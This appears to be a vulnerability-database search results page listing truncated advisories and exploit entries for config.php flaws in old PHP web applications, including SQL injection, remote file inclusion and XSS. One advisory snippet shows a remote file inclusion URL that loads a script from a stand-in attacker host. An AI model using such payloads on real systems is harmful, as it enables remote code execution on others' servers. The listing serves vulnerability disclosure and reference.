Lucene search
K

662 matches found

securityvulns
securityvulns
added 2006/01/22 12:0 a.m.30 views

BlogPHP config.php SQL injection login bypass

--------------------Summary---------------- Software: BlogPHP Sowtware's Web Site: http://www.blogphp.net/ Versions: 12 Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei -----------------Description--------------- Vulnerable scripts...

0.9AI score
Exploits0
NVD
NVD
added 2005/12/31 5:0 a.m.13 views

CVE-2005-4686

PunBB 1.2.9, when used alone or with F-ART BLOG:CMS, includes config.php before calling the unregisterglobals function, which allows attackers to obtain unspecified sensitive information...

5CVSS6.4AI score0.01192EPSS
Exploits0References4
CVE
CVE
added 2005/12/14 11:0 a.m.327 views

CVE-2005-4214

CVE-2005-4214 concerns phpCOIN 1.2.2. Affected component: installation/config flow via config.php. Root cause: the _CCFG['_PKG_PATH_DBSE'] variable is not defined, causing an error message that leaks the installation path to remote attackers. Impact: partial disclosure of information (installatio...

5CVSS6.9AI score0.01801EPSS
Exploits1References8Affected Software1
0day.today
0day.today
added 2005/11/17 12:0 a.m.90 views

EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit

Exploit for unknown platform in category web applications ====================================================================== EkinBoard 1.0.3 config.php SQL Injection / Command Execution Exploit ====================================================================== this works with magicquotesg...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2005/11/17 12:0 a.m.20 views

EkinBoard 1.0.3 - config.php SQL Injection Command Execution

EkinBoard 1.0.3 - config.php SQL Injection Command Execution this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allowcalltimepassreference = on...

0.1AI score
Exploits0
seebug.org
seebug.org
added 2005/11/17 12:0 a.m.18 views

EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit

No description provided by source. ?php ---ekin103xpl.php 10.47 16/11/2005 EkinBoard 1.0.3 config.php SQL Injection through cookie / remote commands execution --- this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields,...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2005/11/17 12:0 a.m.30 views

EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution

this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allowcalltimepassreference = on registerglobals = on Sun-Tzu: "The rising of birds in their flight is th...

7.4AI score
Exploits0
NVD
NVD
added 2005/08/10 4:0 a.m.18 views

CVE-2005-2544

PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...

5CVSS7.6AI score0.01453EPSS
Exploits0References5
securityvulns
securityvulns
added 2005/08/06 12:0 a.m.32 views

Comdev eCommerce config.php Vulnerability

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

0.7AI score
Exploits0
Packet Storm
Packet Storm
added 2005/08/06 12:0 a.m.27 views

comdevInclusion.txt

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

7.4AI score
Exploits0
Cvelist
Cvelist
added 2005/07/06 4:0 a.m.23 views

CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

7.1AI score0.02306EPSS
Exploits0References8
UbuntuCve
UbuntuCve
added 2005/07/06 4:0 a.m.22 views

CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

10CVSS6AI score0.02306EPSS
Exploits0References1
CVE
CVE
added 2005/07/06 4:0 a.m.53 views

CVE-2005-2149

CVE-2005-2149 affects Cacti

10CVSS7.2AI score0.02306EPSS
Exploits0References8Affected Software1
OSV
OSV
added 2005/07/06 4:0 a.m.2 views

DEBIAN-CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

10CVSS8.2AI score0.02306EPSS
Exploits0References1
Cvelist
Cvelist
added 2005/05/24 4:0 a.m.32 views

CVE-2005-1696

Multiple cross-site scripting XSS vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the 1 skin or 2 paletteid parameter to demo.php in the Xanthia module, or 3 the serverName parameter to config.php in the Multisites aka NS-Multisites...

5.7AI score0.00901EPSS
Exploits0References2
NVD
NVD
added 2005/05/24 4:0 a.m.27 views

CVE-2005-1696

Multiple cross-site scripting XSS vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the 1 skin or 2 paletteid parameter to demo.php in the Xanthia module, or 3 the serverName parameter to config.php in the Multisites aka NS-Multisites...

2.6CVSS5.7AI score0.00901EPSS
Exploits0References2
securityvulns
securityvulns
added 2005/04/09 12:0 a.m.60 views

phpBB Upload Script "up.php" Arbitrary File Upload

Advisory 1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: [email protected] - [email protected] $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL:...

0.1AI score
Exploits0
CVE
CVE
added 2005/02/19 5:0 a.m.53 views

CVE-2004-1504

The CVE concerns Just Another Flat File (JAF) CMS 3.0RC. The vulnerability is in the displaycontent function of config.php, which allows remote attackers to gain sensitive information by supplying a blank show parameter; an error message reveals the installation path (demonstrated with index.php)...

5CVSS6.9AI score0.0155EPSS
Exploits1References3Affected Software1
securityvulns
securityvulns
added 2004/12/18 12:0 a.m.41 views

phphpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit

php bug in ext/standart/varunserializer.c in php 4.3.10 for dump php heap memory with phpbb2 ,who use unserialize for cookie , and found the config.phpsql password in the heap. you need http://overdose.tcpteam.org/serv.h and http://overdose.tcpteam.org/serv.cpp for compile / coded by overdose...

7AI score
Exploits0
securityvulns
securityvulns
added 2004/01/16 12:0 a.m.34 views

PhpDig 1.6.x: remote command execution

Product: PhpDig 1.6.x Vendor: phpdig.net Author: FraMe frame at kernelpanik.org URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. Details 4. Patches. 1. Overview. PhpDig is a http spider/search engine written in Php with a MySql database in backend. PhpDig builds a glossary...

0.8AI score
Exploits0
Rows per page
Query Builder